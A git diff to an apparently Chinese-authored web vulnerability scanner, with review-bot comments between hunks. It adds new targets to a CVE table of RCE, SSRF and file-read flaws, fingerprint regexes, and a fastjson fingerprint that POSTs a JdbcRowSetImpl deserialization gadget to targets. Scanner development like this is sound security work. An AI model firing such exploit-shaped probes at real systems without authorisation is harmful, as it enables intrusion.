+| Fastjson | CNVD-2019-22238 | unSerialize | Fastjson <=1.2.47 deSerialization |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Gitea | None | unAuth | Gitea 1.4.0 unAuthorized |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Gitlab | CVE-2021-22205 | RCE | GitLab Pre-Auth Remote code execution |
+| Gitlab | CVE-2021-22214 | SSRF | Gitlab CI Lint API SSRF |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Grafana | CVE-2021-43798 | FileRead | Grafana 8.x Directory traversal |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Jenkins | CVE-2018-1000861 | RCE | jenkins Remote code execution |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Keycloak | CVE-2020-10770 | SSRF | request_uri SSRF |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Landray | CNVD-2021-28277 | FileRead/SSRF| Landray-OA FileRead/SSRF |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| mongo-express | CVE-2019-10758 | RCE | Remote code execution |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Nodejs | CVE-2017-14849 | FileRead | Node.js Directory traversal |
+| Nodejs | CVE-2021-21315 | RCE | Node.js Remote code execution |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| NodeRED | CVE-2021-3223 | FileRead | Node-RED Directory traversal |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Ruby on Rails |
CVE-2018-3760 | FileRead | Ruby on Rails Directory traversal | +| Ruby on Rails | CVE-2019-5418 | FileRead | Ruby on Rails FileRead | +| Ruby on Rails | CVE-2020-8163 | RCE | Ruby on Rails Remote code execution | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| ShowDoc | CNVD-2020-26585 | FileUpload | ShowDoc writes to any file | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Spring | CVE-2020-5410 | FileRead | Spring Cloud Directory traversal | +| Spring | CVE-2021-21234 | FileRead | Spring Boot Directory traversal | +| Spring | CVE-2022-22947 | RCE | Spring Cloud Gateway SpEl Remote code execution | +| Spring | CVE-2022-22963 | RCE | Spring Cloud Function SpEL Remote code execution | +| Spring | CVE-2022-22965 | RCE | Spring Framework Remote code execution | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| ThinkPHP | CVE-2018-1002015 | RCE | ThinkPHP5.x Remote code execution | +| ThinkPHP | CNVD-2018-24942 | RCE | The forced route is not enabled Remote code execution | +| ThinkPHP | CNNVD-201901-445 | RCE | Core class Request Remote code execution | +| ThinkPHP | None | RCE | ThinkPHP2.x Remote code execution | +| ThinkPHP | None | SQLinject | ThinkPHP5 ids SQLinject | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Ueditor | None | SSRF | Ueditor SSRF | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Oracle Weblogic | CVE-2014-4210 | SSRF | Weblogic SSRF | +| Oracle Weblogic | CVE-2017-10271 | unSerialize | Weblogic XMLDecoder deSerialization | +| Oracle Weblogic | CVE-2019-2725 | unSerialize | Weblogic wls9_async deSerialization | +| Oracle Weblogic | CVE-2020-14750 | unAuth | 
Weblogic Authentication bypass |
+| Oracle Weblogic | CVE-2020-14882 | RCE | Weblogic Unauthorized command execution |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Webmin | CVE-2019-15107 | RCE | Webmin Pre-Auth Remote code execution |
+| Webmin | CVE-2019-15642 | RCE | Webmin Remote code execution |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Yonyou | CNNVD-201610-923 | SQLinject | Yonyou-GRP-U8 Proxy SQLinject |
+| Yonyou | CNVD-2021-30167 | RCE | Yonyou-NC BeanShell Remote code execution |
+| Yonyou | None | FileRead | Yonyou-ERP-NC NCFindWeb Directory traversal |
+| Yonyou | None | DSinfo | Yonyou-U8-OA getSessionList.jsp Disclosure information |
+| Yonyou | None | SQLinject | Yonyou-U8-OA test.jsp SQLinject |
++----------------------+--------------------+--------------+------------------------------------------------------------+
 ```
 </details>
diff --git a/lib/core/coreScan.py b/lib/core/coreScan.py
index 86d8fe2..7aec2f7 100644
--- a/lib/core/coreScan.py
+++ b/lib/core/coreScan.py
@@ -28,12 +28,18 @@
 from payloads.ElasticSearch import elasticsearch
 from payloads.F5BIGIP import f5bigip
 from payloads.Fastjson import fastjson
+from payloads.Gitea import gitea
+from payloads.Gitlab import gitlab
+from payloads.Grafana import grafana
+from payloads.ApacheHadoop import hadoop
 from payloads.Jenkins import jenkins
 from payloads.Keycloak import keycloak
 # from payloads.Kindeditor import kindeditor
+from payloads.Landray import landray
 from payloads.MongoExpress import mongoexpress
 from payloads.Nodejs import nodejs
 from payloads.NodeRED import nodered
+from payloads.RubyOnRails import rails
 from payloads.ShowDoc import showdoc
 from payloads.Spring import spring
 from payloads.ThinkPHP import thinkphp
diff --git a/lib/initial/config.py b/lib/initial/config.py
index 5c8fd94..aec9184 100644
--- a/lib/initial/config.py +++ b/lib/initial/config.py @@ -87,11 +87,16 @@ def __init__(self, args): 'discuz', 'django', 'drupal', 'elasticsearch', 'f5bigip', 'fastjson', 'flink', + # 'gitea', 'gitlab', 'grafana', + 'gitea', 'gitlab', + 'hadoop', 'jenkins', # 'keycloak', 'kindeditor', 'keycloak', + 'landray', 'mongoexpress', - 'nacos', 'nodered', 'nodejs', + 'nacos', 'nodejs', 'nodered', + 'rails', 'showdoc', 'solr', 'struts2', 'spring', 'thinkphp', 'tomcat', 'ueditor', diff --git a/lib/initial/language.py b/lib/initial/language.py index d9054e1..d21eefb 100644 --- a/lib/initial/language.py +++ b/lib/initial/language.py @@ -62,7 +62,7 @@ def language(): }, 'app_list_help': { 'title': 'Supported target types(Case insensitive)', - 'name': 'AliDruid,nacos,airflow,apisix,flink,solr,struts2,tomcat,appweb,confluence,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,jenkins,keycloak,mongoexpress,nodejs,nodered,showdoc,spring,thinkphp,ueditor,weblogic,webmin,yonyou' + 'name': 'AliDruid,nacos,airflow,apisix,flink,hadoop,solr,struts2,tomcat,appweb,confluence,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,gitea,gitlab,grafana,jenkins,keycloak,landray,mongoexpress,nodejs,nodered,rails,showdoc,spring,thinkphp,ueditor,weblogic,webmin,yonyou' }, 'core': { 'start': { @@ -177,7 +177,7 @@ def language(): }, 'app_list_help': { 'title': '支持的目标类型(-a参数, 不区分大小写)', - 'name': 'AliDruid,nacos,airflow,apisix,flink,solr,struts2,tomcat,appweb,confluence,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,jenkins,keycloak,mongoexpress,nodejs,nodered,showdoc,spring,thinkphp,ueditor,weblogic,webmin,yonyou' + 'name': 'AliDruid,nacos,airflow,apisix,flink,hadoop,solr,struts2,tomcat,appweb,confluence,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,gitea,gitlab,grafana,jenkins,keycloak,landray,mongoexpress,nodejs,nodered,rails,showdoc,spring,thinkphp,ueditor,weblogic,webmin,yonyou' }, 'core': { 'start': { 
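Review bot: `'grafana'` never reaches the live list in this hunk — it survives only in the commented-out line `# 'gitea', 'gitlab', 'grafana',` while the real addition is just `'gitea', 'gitlab',` — yet the same commit imports `payloads.Grafana` in coreScan.py and advertises `grafana` as an accepted `-a` value in both `app_list_help` strings of language.py. If this list is what validates `-a` or decides which scanner modules run (the `__init__` it sits in starts and ends outside the hunk, so its consumer is not visible here), Grafana CVE-2021-43798 is documented but unreachable, either as a silent no-op or as an unknown-target error. The fix is the one-token change `'gitea', 'gitlab', 'grafana',`, and the stale commented line should go with it.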
diff --git a/lib/initial/list.py b/lib/initial/list.py index e9e3709..9311be5 100644 --- a/lib/initial/list.py +++ b/lib/initial/list.py @@ -8,7 +8,7 @@ def list(): ''' 显示漏洞列表 ''' vul_num = 0 vul_list = '' - vul_list += '+' + ('-'*22) + '+' + ('-'*20) + '+' + ('-'*14) + '+' + ('-'*10) + '+' + ('-'*73) + '+\n' + vul_list += '+' + ('-'*22) + '+' + ('-'*20) + '+' + ('-'*14) + '+' + ('-'*68) + '+\n' for vul in vul_info: for info in vul_info[vul]: @@ -16,10 +16,9 @@ def list(): vul_list += '| {}|'.format(vul.ljust(21)) vul_list += ' {}|'.format(info['vul_id'].ljust(19)) vul_list += ' {}|'.format(info['type'].ljust(13)) - vul_list += ' {}|'.format(info['method'].ljust(9)) - vul_list += ' {}\t|'.format(info['description'].ljust(62)) + vul_list += ' {}\t|'.format(info['description'].ljust(57)) vul_list += '\n' - vul_list += '+' + ('-'*22) + '+' + ('-'*20) + '+' + ('-'*14) + '+' + ('-'*10) + '+' + ('-'*73) + '+\n' + vul_list += '+' + ('-'*22) + '+' + ('-'*20) + '+' + ('-'*14) + '+' + ('-'*68) + '+\n' print(color.cyan(vul_list + str(vul_num - 1))) # print(vul_num) @@ -30,7 +29,6 @@ def list(): { 'vul_id': 'Vul_id', 'type': 'Type', - 'method': 'Method', 'description': 'Description\t' } ], @@ -38,7 +36,6 @@ def list(): { 'vul_id': 'None', 'type': 'unAuth', - 'method': 'GET', 'description': '阿里巴巴Druid未授权访问' } ], @@ -46,7 +43,6 @@ def list(): { 'vul_id': 'CVE-2021-29441', 'type': 'unAuth', - 'method': 'GET/POST', 'description': '阿里巴巴Nacos未授权访问' } ], @@ -54,7 +50,6 @@ def list(): { 'vul_id': 'CVE-2020-17526', 'type': 'unAuth', - 'method': 'GET', 'description': 'Airflow身份验证绕过' } ], @@ -62,7 +57,6 @@ def list(): { 'vul_id': 'CVE-2020-13945', 'type': 'unAuth', - 'method': 'GET', 'description': 'Apache APISIX默认密钥' } ], 
@@ -70,15 +64,20 @@ def list(): { 'vul_id': 'CVE-2020-17519', 'type': 'FileRead', - 'method': 'GET', 'description': 'Flink目录遍历' } ], + 'Apache Hadoop': [ + { + 'vul_id': 'None', + 'type': 'unAuth', + 'description': 'Hadoop YARN ResourceManager 未授权访问' + } + ], 'Apache Solr': [ { 'vul_id': 'CVE-2021-27905', 'type': 'SSRF', - 'method': 'GET/POST', 'description': 'Solr SSRF/任意文件读取' } ], @@ -86,37 +85,31 @@ def list(): { 'vul_id': 'S2-001', 'type': 'RCE', - 'method': 'POST', 'description': 'Struts2远程代码执行' }, { 'vul_id': 'S2-005', 'type': 'RCE', - 'method': 'GET', 'description': 'Struts2远程代码执行' }, { 'vul_id': 'S2-007', 'type': 'RCE', - 'method': 'GET', 'description': 'Struts2远程代码执行' }, { 'vul_id': 'S2-008', 'type': 'RCE', - 'method': 'GET', 'description': 'Struts2远程代码执行' }, { 'vul_id': 'S2-009', 'type': 'RCE', - 'method': 'GET', 'description': 'Struts2远程代码执行' }, { 'vul_id': 'S2-012', 'type': 'RCE', - 'method': 'GET', 'description': 'Struts2远程代码执行' } ], @@ -124,7 +117,6 @@ def list(): { 'vul_id': 'CVE-2017-12615', 'type': 'FileUpload', - 'method': 'PUT', 'description': 'PUT方法任意文件写入' } ], @@ -132,7 +124,6 @@ def list(): { 'vul_id': 'CVE-2018-8715', 'type': 'unAuth', - 'method': 'GET', 'description': 'AppWeb身份认证绕过' } ], @@ -140,25 +131,21 @@ def list(): { 'vul_id': 'CVE-2015-8399', 'type': 'FileRead', - 'method': 'GET', 'description': 'Confluence任意文件包含' }, { 'vul_id': 'CVE-2019-3396', 'type': 'RCE/FileRead', - 'method': 'POST', 'description': 'Confluence路径遍历和命令执行' }, { 'vul_id': 'CVE-2021-26084', 'type': 'RCE', - 'method': 'POST', 'description': 'Confluence Webwork Pre-Auth OGNL表达式命令注入' }, { 'vul_id': 'CVE-2022-26134', 'type': 'RCE', - 'method': 'GET', 'description': 'Confluence远程代码执行' } ], @@ -166,7 +153,6 @@ def list(): { 'vul_id': 'CVE-2020-3580', 'type': 'XSS', - 'method': 'POST', 'description': '思科ASA/FTD XSS跨站脚本攻击' } ], @@ -174,7 +160,6 @@ def list(): { 'vul_id': 'wooyun-2010-080723', 'type': 'RCE', - 'method': 'GET', 'description': '全局变量防御绕过RCE' } ], 
@@ -182,31 +167,26 @@ def list(): { 'vul_id': 'CVE-2017-12794', 'type': 'XSS', - 'method': 'GET', 'description': 'debug page XSS跨站脚本攻击' }, { 'vul_id': 'CVE-2018-14574', 'type': 'Redirect', - 'method': 'GET', 'description': 'CommonMiddleware url重定向' }, { 'vul_id': 'CVE-2019-14234', 'type': 'SQLinject', - 'method': 'GET', 'description': 'JSONfield SQL注入' }, { 'vul_id': 'CVE-2020-9402', 'type': 'SQLinject', - 'method': 'GET', 'description': 'GIS SQL注入' }, { 'vul_id': 'CVE-2021-35042', 'type': 'SQLinject', - 'method': 'GET', 'description': 'QuerySet.order_by SQL注入' } ], @@ -214,25 +194,21 @@ def list(): { 'vul_id': 'CVE-2014-3704', 'type': 'SQLinject', - 'method': 'POST', 'description': 'Drupal < 7.32 Drupalgeddon SQL 注入' }, { 'vul_id': 'CVE-2017-6920', 'type': 'RCE', - 'method': 'POST', 'description': 'Drupal Core 8 PECL YAML 反序列化代码执行' }, { 'vul_id': 'CVE-2018-7600', 'type': 'RCE', - 'method': 'POST', 'description': 'Drupal Drupalgeddon 2 远程代码执行' }, { 'vul_id': 'CVE-2018-7602', 'type': 'RCE', - 'method': 'POST', 'description': 'Drupal 远程代码执行' } ], @@ -240,25 +216,21 @@ def list(): { 'vul_id': 'CVE-2014-3120', 'type': 'RCE', - 'method': 'POST', 'description': 'ElasticSearch命令执行' }, { 'vul_id': 'CVE-2015-1427', 'type': 'RCE', - 'method': 'POST', 'description': 'ElasticSearch Groovy 沙盒绕过&&代码执行' }, { 'vul_id': 'CVE-2015-3337', 'type': 'FileRead', - 'method': 'GET', 'description': 'ElasticSearch 目录穿越' }, { 'vul_id': 'CVE-2015-5531', 'type': 'FileRead', - 'method': 'PUT/GET', 'description': 'ElasticSearch 目录穿越' }, ], @@ -266,13 +238,11 @@ def list(): { 'vul_id': 'CVE-2020-5902', 'type': 'RCE', - 'method': 'GET', 'description': 'BIG-IP远程代码执行' }, { 'vul_id': 'CVE-2022-1388', 'type': 'unAuth', - 'method': 'POST', 'description': 'BIG-IP身份认证绕过' } ], 
@@ -280,21 +250,44 @@ def list(): { 'vul_id': 'CNVD-2017-02833', 'type': 'unSerialize', - 'method': 'POST', 'description': 'Fastjson <= 1.2.24 反序列化' }, { 'vul_id': 'CNVD-2019-22238', 'type': 'unSerialize', - 'method': 'POST', 'description': 'Fastjson <= 1.2.47 反序列化' } ], + 'Gitea': [ + { + 'vul_id': 'None', + 'type': 'unAuth', + 'description': 'Gitea 1.4.0 未授权访问' + }, + ], + 'Gitlab': [ + { + 'vul_id': 'CVE-2021-22205', + 'type': 'RCE', + 'description': 'GitLab Pre-Auth 远程命令执行' + }, + { + 'vul_id': 'CVE-2021-22214', + 'type': 'SSRF', + 'description': 'Gitlab CI Lint API未授权 SSRF' + } + ], + 'Grafana': [ + { + 'vul_id': 'CVE-2021-43798', + 'type': 'FileRead', + 'description': 'Grafana 8.x 插件模块路径遍历' + }, + ], 'Jenkins': [ { 'vul_id': 'CVE-2018-1000861', 'type': 'RCE', - 'method': 'POST', 'description': 'jenkins 远程命令执行' } ], @@ -302,7 +295,6 @@ def list(): { 'vul_id': 'CVE-2020-10770', 'type': 'SSRF', - 'method': 'GET', 'description': '使用request_uri调用未经验证的URL' } ], @@ -314,11 +306,17 @@ def list(): # 'description': 'Kindeditor 目录遍历' # } # ], + 'Landray': [ + { + 'vul_id': 'CNVD-2021-28277', + 'type': 'FileRead/SSRF', + 'description': '蓝凌OA 任意文件读取/SSRF' + } + ], 'mongo-express': [ { 'vul_id': 'CVE-2019-10758', 'type': 'RCE', - 'method': 'POST', 'description': '未授权远程代码执行' } ], @@ -326,13 +324,11 @@ def list(): { 'vul_id': 'CVE-2017-14849', 'type': 'FileRead', - 'method': 'GET', 'description': 'Node.js目录穿越' }, { 'vul_id': 'CVE-2021-21315', 'type': 'RCE', - 'method': 'GET', 'description': 'Node.js命令执行' } ], 
@@ -340,15 +336,30 @@ def list(): { 'vul_id': 'CVE-2021-3223', 'type': 'FileRead', - 'method': 'GET', 'description': 'Node-RED 任意文件读取' } ], + 'Ruby on Rails': [ + { + 'vul_id': 'CVE-2018-3760', + 'type': 'FileRead', + 'description': 'Ruby on Rails 路径遍历' + }, + { + 'vul_id': 'CVE-2019-5418', + 'type': 'FileRead', + 'description': 'Ruby on Rails 任意文件读取' + }, + { + 'vul_id': 'CVE-2020-8163', + 'type': 'RCE', + 'description': 'Ruby on Rails 命令执行' + } + ], 'ShowDoc': [ { 'vul_id': 'CNVD-2020-26585', 'type': 'FileUpload', - 'method': 'POST', 'description': 'ShowDoc 任意文件上传' } ], @@ -356,31 +367,26 @@ def list(): { 'vul_id': 'CVE-2020-5410', 'type': 'FileRead', - 'method': 'GET', 'description': 'Spring Cloud目录遍历' }, { 'vul_id': 'CVE-2021-21234', 'type': 'FileRead', - 'method': 'GET', 'description': 'Spring Boot目录遍历' }, { 'vul_id': 'CVE-2022-22947', 'type': 'RCE', - 'method': 'POST', 'description': 'Spring Cloud Gateway SpEl远程代码执行' }, { 'vul_id': 'CVE-2022-22963', 'type': 'RCE', - 'method': 'POST', 'description': 'Spring Cloud Function SpEL远程代码执行' }, { 'vul_id': 'CVE-2022-22965', 'type': 'RCE', - 'method': 'GET/POST', 'description': 'Spring Framework远程代码执行' } ], @@ -388,31 +394,26 @@ def list(): { 'vul_id': 'CVE-2018-1002015', 'type': 'RCE', - 'method': 'GET', 'description': 'ThinkPHP5.x 远程代码执行' }, { 'vul_id': 'CNVD-2018-24942', 'type': 'RCE', - 'method': 'GET', 'description': '未开启强制路由导致RCE' }, { 'vul_id': 'CNNVD-201901-445', 'type': 'RCE', - 'method': 'POST', 'description': '核心类Request远程代码执行' }, { 'vul_id': 'None', 'type': 'RCE', - 'method': 'GET', 'description': 'ThinkPHP2.x 远程代码执行' }, { 'vul_id': 'None', 'type': 'SQLinject', - 'method': 'GET', 'description': 'ThinkPHP5 ids参数SQL注入' } ], @@ -420,7 +421,6 @@ def list(): { 'vul_id': 'None', 'type': 'SSRF', - 'method': 'GET', 'description': 'Ueditor编辑器SSRF' } ], 
@@ -428,31 +428,26 @@ def list(): { 'vul_id': 'CVE-2014-4210', 'type': 'SSRF', - 'method': 'GET', 'description': 'Weblogic 服务端请求伪造' }, { 'vul_id': 'CVE-2017-10271', 'type': 'unSerialize', - 'method': 'POST', 'description': 'Weblogic XMLDecoder反序列化' }, { 'vul_id': 'CVE-2019-2725', 'type': 'unSerialize', - 'method': 'POST', 'description': 'Weblogic wls9_async反序列化' }, { 'vul_id': 'CVE-2020-14750', 'type': 'unAuth', - 'method': 'GET', 'description': 'Weblogic 权限验证绕过' }, { 'vul_id': 'CVE-2020-14882', 'type': 'RCE', - 'method': 'GET', 'description': 'Weblogic 未授权命令执行' } ], @@ -460,28 +455,39 @@ def list(): { 'vul_id': 'CVE-2019-15107', 'type': 'RCE', - 'method': 'POST', 'description': 'Webmin Pre-Auth 远程代码执行' }, { 'vul_id': 'CVE-2019-15642', 'type': 'RCE', - 'method': 'POST', 'description': 'Webmin 远程代码执行' } ], 'Yonyou': [ + { + 'vul_id': 'CNNVD-201610-923', + 'type': 'SQLinject', + 'description': '用友GRP-U8 Proxy SQL注入' + }, { 'vul_id': 'CNVD-2021-30167', 'type': 'RCE', - 'method': 'GET', 'description': '用友NC BeanShell远程命令执行' }, { 'vul_id': 'None', 'type': 'FileRead', - 'method': 'GET', 'description': '用友ERP-NC NCFindWeb目录遍历' + }, + { + 'vul_id': 'None', + 'type': 'DSinfo', + 'description': '用友U8 OA getSessionList.jsp 敏感信息泄漏' + }, + { + 'vul_id': 'None', + 'type': 'SQLinject', + 'description': '用友U8 OA test.jsp SQL注入' } ] } diff --git a/lib/initial/parse.py b/lib/initial/parse.py index 5bf0348..6e4a82f 100644 --- a/lib/initial/parse.py +++ b/lib/initial/parse.py @@ -19,7 +19,7 @@ def parse(): python3 vulcat.py -u https://www.example.com/ -a tomcat -v CVE-2017-12615 python3 vulcat.py -f url.txt -t 10 python3 vulcat.py --list -''', version='vulcat.py-1.1.1\n') +''', version='vulcat.py-1.1.2\n') # * 指定目标 target = parser.add_option_group(lang['target_help']['title'], lang['target_help']['name']) target.add_option('-u', '--url', type='string', dest='url', default=None, help=lang['target_help']['url']) 
@@ -55,7 +55,6 @@ def parse(): general = parser.add_option_group(lang['general_help']['title'], lang['general_help']['name']) general.add_option('--no-waf', dest='no_waf', action='store_true', help=lang['general_help']['no_waf']) general.add_option('--no-poc', dest='no_poc', action='store_true', help=lang['general_help']['no_poc']) - # general.add_option('--no-webapp', dest='no_webapp', action='store_true', help='') general.add_option('--batch', dest='batch', action='store_true', help=lang['general_help']['batch']) # * 查看漏洞列表 diff --git a/lib/plugins/fingerprint/webapp.py b/lib/plugins/fingerprint/webapp.py index 8a92d33..346e528 100644 --- a/lib/plugins/fingerprint/webapp.py +++ b/lib/plugins/fingerprint/webapp.py 
@@ -293,6 +293,64 @@ def __init__(self): r'JSON parse error: set property error, autoCommit;' ] }, + { + 'name': 'fastjson', + 'path': '', + 'data': '{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"abcd","autoCommit":true}}', + 'fingerprint': [ + r'com\.alibaba\.fastjson\.JSONException:', + r'JSON parse error: set property error, autoCommit;' + ] + }, + { + 'name': 'gitea', + 'path': '', + 'data': '', + 'fingerprint': [ + r'<title>.* - Gitea: Git with a cup of tea</title>', + r'Copyright (c) .* The Gitea Authors', + r'Gitea 当前版本: .* 页面: <strong>\d*ms</strong> 模板: <strong>\d*ms</strong>', + r'Go 语言</a> 支持的平台都可以运行 Gitea,包括 Windows、Mac、Linux 以及 ARM。挑一个您喜欢的就行!', + r'<p class="large">.*一个廉价的树莓派的配置足以满足 Gitea 的最低系统硬件要求。最大程度上节省您的服务器资源!.*</p>', + r'所有的代码都开源在 <a target="_blank" rel="noopener" href="https://github\.com/go-gitea/gitea/">GitHub</a> 上,赶快加入我们来共同发展这个伟大的项目!还等什么?成为贡献者吧!' + ] + }, + { + 'name': 'gitlab', + 'path': '', + 'data': '', + 'fingerprint': [ + r'<title>GitLab</title>', + r'<meta content="GitLab" property="og:site_name">', + r'<meta content="GitLab Community Edition" property="og:description">', + r'meta content="GitLab Community Edition" property="twitter:description"', + r'meta content="GitLab Community Edition" name="description"', + r'<a href="https://about\.gitlab\.com/">About GitLab</a>' + ] + }, + { + 'name': 'grafana', + 'path': '', + 'data': '', + 'fingerprint': [ + r'<link rel="mask-icon" href="public/img/grafana_mask_icon\.svg"', + r'body class="theme-dark app-grafana', + r'public/img/grafana_icon\.svg', + r'Loading Grafana.*2\..*grafana.*3\..*4\..*5\.', + r'window\.__grafana.*' + ] + }, + { + 'name': 'hadoop', + 'path': '', + 'data': '', + 'fingerprint': [ + r'<img src="/static/hadoop-st\.png">', + r'<a href="/jmx\?qry=Hadoop:\*">Server metrics</a>', + r"'sType':'natural', 'aTargets': \[0\], 'mRender': parseHadoopID", + 
r'<pre>org\.apache\.hadoop\.yarn\.webapp\.WebAppException:' + ] + }, { 'name': 'jenkins', 'path': '', @@ -322,6 +380,15 @@ def __init__(self): # r'KindEditor - WYSIWYG HTML Editor for Internet' # ] # }, + { + 'name': 'landray', + 'path': '', + 'data': '', + 'fingerprint': [ + r'\["sys/ui/extend.{0,50}\.css"\]', + r"'lui': 'sys/ui/js'" + ] + }, { 'name': 'mongoexpress', 'path': '', @@ -353,6 +420,21 @@ def __init__(self): r'<title>Node-RED</title>' ] }, + { + 'name': 'rails', + 'path': '', + 'data': '', + 'fingerprint': [ + r'<title>Ruby on Rails</title>', + r'<h1>Yay! You’re on Rails!</h1>', + r'<strong>Rails version:</strong>.*<br />', + r'<strong>Ruby version:</strong>.*(.*)', + r'<p><code>Rails\.root: .*</code></p>', + r'<li>For more information about routes, please see the Rails guide<a href="http://guides\.rubyonrails\.org/routing\.html">Rails Routing from the Outside In</a>\.</li>', + r'<title>RailsFileContent</title>', + r'<script src="/assets/.{0,30}\.self-.{64}\.js\?body=1" data-turbolinks-track=".{0,10}"></script>' + ] + }, { 'name': 'showdoc', 'path': '', @@ -458,7 +540,17 @@ def __init__(self): 'data': '', 'fingerprint': [ r'<div class="footer">版权所有.*用友网络科技股份有限公司.*', - r'<title>YONYOU NC</title>' + r'<title>YONYOU NC</title>', + r'//判断操作系统.*\.\./Client/Uclient/UClient\.dmg.*UClient客户端下载', + r'<title>用友GRP-U8.*行政事业内控管理软件.*</title>', + r'<div class="foot foot1".*>北京用友政务软件有限公司.*</div>', + r'<script type="text/javascript" src="/yyoa/seeyonoa/common/js/jquery/jquery\.js"></script>', + r'<script type="text/javascript" src="seeyonoa/common/js/popDialog\.jsp"></script>', + r'<li class="A6_name"><img src="seeyonoa/ui/images/login/oem_name\.png" /></li>', + r'<title>.* 《用友U8\+OA基础版》</title>', + r'<title>.* 《用友U8-OA企业版》</title>', + r'<li class="copyright"><span>©用友软件珠海研发基地</span></li>', + r'<title>.*-FE协作办公平台\d\.\d(\.\d)?</title>' ] }, # { diff --git a/lib/report/output.py b/lib/report/output.py index a0a8b63..561d7e3 100644 --- a/lib/report/output.py 
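Review bot: The new `fastjson` fingerprint entry ends with the same two regexes (`com\.alibaba\.fastjson\.JSONException:` and `JSON parse error: set property error, autoCommit;`) that close the entry immediately above it in the hunk's context lines, so this reads as a second probe for the same product that differs only in its `data` body; if that preceding entry is also a fastjson probe, every target now receives two POSTs during fingerprinting, and the new body is a `com.sun.rowset.JdbcRowSetImpl` deserialization gadget rather than an inert banner request. Either drop the duplicate or document why both bodies are required, e.g. `# active probe: POSTs a JdbcRowSetImpl gadget with a dummy dataSourceName; this is exploit-shaped traffic and fires before any -a/-v selection`. The `gitea` entry also matches mostly zh-CN UI strings (`当前版本`, `树莓派`, ...), so on an English-locale instance only the `<title>` and Copyright patterns can hit; a one-line `# most gitea patterns assume the zh-CN locale` would spare the next maintainer the puzzle. The `__init__` holding this list starts and ends outside the hunk.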
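Review bot: In the new `rails` entry the pattern `r'<strong>Ruby version:</strong>.*(.*)'` has unescaped parentheses, so `(.*)` is an empty-matching capture group and the regex fires on any page that contains `<strong>Ruby version:</strong>` followed by anything. The parentheses were presumably meant literally (the platform string the Rails welcome page prints after the version), which would be `r'<strong>Ruby version:</strong>.*\(.*\)'`; as written the pattern is harmless but adds nothing over a plain substring match. The `__init__` this list belongs to starts and ends outside this hunk.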
+++ b/lib/report/output.py @@ -82,7 +82,7 @@ def output_json(results, filename, lang): # * Response对象不能json化, 转为字符串 for key in result_info.keys(): if type(result_info[key]) == requests.models.Response: - result_info[key] = output_res(result_info[key], iscolor=False) + result_info[key] = output_res(key, result_info[key], iscolor=False) results_info_list.append(json.dumps(result_info, indent=4) + '\n') results_info_list = set(results_info_list) @@ -125,7 +125,7 @@ def output_vul_info_color(result): result_info += output_dict(key, value) elif value_type == requests.models.Response: # * Response输出方式 - result_info += output_res(value) + result_info += output_res(key, value) return result_info @@ -144,7 +144,7 @@ def output_vul_info(result): result_info += output_dict(key, value, iscolor=False) elif value_type == requests.models.Response: - result_info += output_res(value, iscolor=False) + result_info += output_res(key, value, iscolor=False) return result_info @@ -205,12 +205,13 @@ def output_dict(key, value, iscolor=True): return info_dict -def output_res(res, iscolor=True): +def output_res(key, res, iscolor=True): ''' 接收一个requests结果, 返回一个http数据包 ''' info_res = '' if iscolor: try: + info_res += color.yellow_ex(key) + ':' info_res += color.red_ex(' [Request') info_res += color.black_ex('\n' + res.request.method + ' ' + res.request.path_url + ' ' + http.client.HTTPConnection._http_vsn_str) info_res += color.black_ex('\n' + 'Host' + ': ' + logger.get_domain(res.request.url)) 
@@ -218,14 +219,18 @@ def output_res(res, iscolor=True): for key, value in res.request.headers.items(): info_res += color.black_ex('\n' + key + ': ' + value) if res.request.body: - info_res += color.black_ex('\n\n' + res.request.body) + if (type(res.request.body) == bytes): + info_res += color.black_ex('\n\n' + res.request.body.decode()) + else: + info_res += color.black_ex('\n\n' + res.request.body) info_res += color.red_ex(']') - info_res += color.reset('\n') + info_res += color.reset('\n ') except: return info_res else: try: + info_res += key + ':' info_res += ' [Request' info_res += '\n' + res.request.method + ' ' + res.request.path_url + ' ' + http.client.HTTPConnection._http_vsn_str info_res += '\n' + 'Host' + ': ' + logger.get_domain(res.request.url) @@ -233,9 +238,12 @@ def output_res(res, iscolor=True): for key, value in res.request.headers.items(): info_res += '\n' + key + ': ' + value if res.request.body: - info_res += '\n\n' + res.request.body + if (type(res.request.body) == bytes): + info_res += '\n\n' + res.request.body.decode() + else: + info_res += '\n\n' + res.request.body - info_res += ']' + info_res += ']\n ' except: return info_res diff --git a/lib/tool/logger.py b/lib/tool/logger.py index 9da38f2..617dda5 100644 --- a/lib/tool/logger.py +++ b/lib/tool/logger.py @@ -68,7 +68,10 @@ def logging_4(self, vul_info, status_code, res): for key, value in res.request.headers.items(): info_4 += color.black_ex('\n' + key + ': ' + value) if res.request.body: - info_4 += color.black_ex('\n\n' + res.request.body) + if (type(res.request.body) == bytes): + info_4 += color.black_ex('\n\n' + res.request.body.decode()) + else: + info_4 += color.black_ex('\n\n' + res.request.body) info_4 += color.red_ex('\n]') info_4 += color.reset('') diff --git a/payloads/ApacheHadoop.py b/payloads/ApacheHadoop.py new file mode 100644 index 0000000..e9b9532 --- /dev/null +++ b/payloads/ApacheHadoop.py 
